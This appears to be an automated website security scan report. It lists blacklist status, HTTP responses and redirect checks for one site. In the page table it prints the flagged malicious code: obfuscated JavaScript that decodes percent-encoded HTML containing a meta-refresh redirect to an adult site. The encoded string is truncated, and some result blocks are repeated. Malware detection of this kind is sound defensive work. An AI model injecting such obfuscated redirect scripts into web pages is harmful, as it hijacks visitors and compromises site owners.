Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yourinternetwebsite.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yourinternetwebsite.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yourinternetwebsite.com/ | 200 OK Content-Length: 1624 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function xhtmldecode(x){ document.write(unescape(x)) } function runit(){ x="%3C%68%74%6D%6C%3E%0D%0A%3C%48%45%41%44%3E%20%0D%0A%3C%54%49%54%4C%45%3E%40%70%75%62%6C%69%63%6E%75%64%65%73%6C%75%74%2E%63%6F%6D%3C%2F%54%49%54%4C%45%3E%20%0D%0A%3C%4D%45%54%41%20%48%54%54%50%2D%45%51%55%49%56%3D%22%52%65%66%72%65%73%68%22%20%43%4F%4E%54%45%4E%54%3D%22%31%30%3B%20%55%52%4C%3D%68%74%74%70%3A%2F%2F%70%75%62%6C%69%63%6E%75%64%65%73%6C%75%74%2E%63%6F%6D%2F%22%3E%20%0D%0A%3C%2F%48 xhtmldecode(x) } runit() Antivirus reports:
| ||
http://yourinternetwebsite.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yourinternetwebsite.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 22:47:33 GMT
Accept-Ranges: bytes
Server: nginx
Vary: Accept-Encoding
Content-Length: 1624
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 08:30:59 GMT
Ngpass_all: 1
...1624 bytes of data.
GET / HTTP/1.1
Host: yourinternetwebsite.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 22:47:33 GMT
Accept-Ranges: bytes
Server: nginx
Vary: Accept-Encoding
Content-Length: 1624
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 08:30:59 GMT
Ngpass_all: 1
...1624 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yourinternetwebsite.com
Referer: http://www.google.com/search?q=yourinternetwebsite.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yourinternetwebsite.com
Referer: http://www.google.com/search?q=yourinternetwebsite.com
Result:
The result is similar to the first query. There are no suspicious redirects found.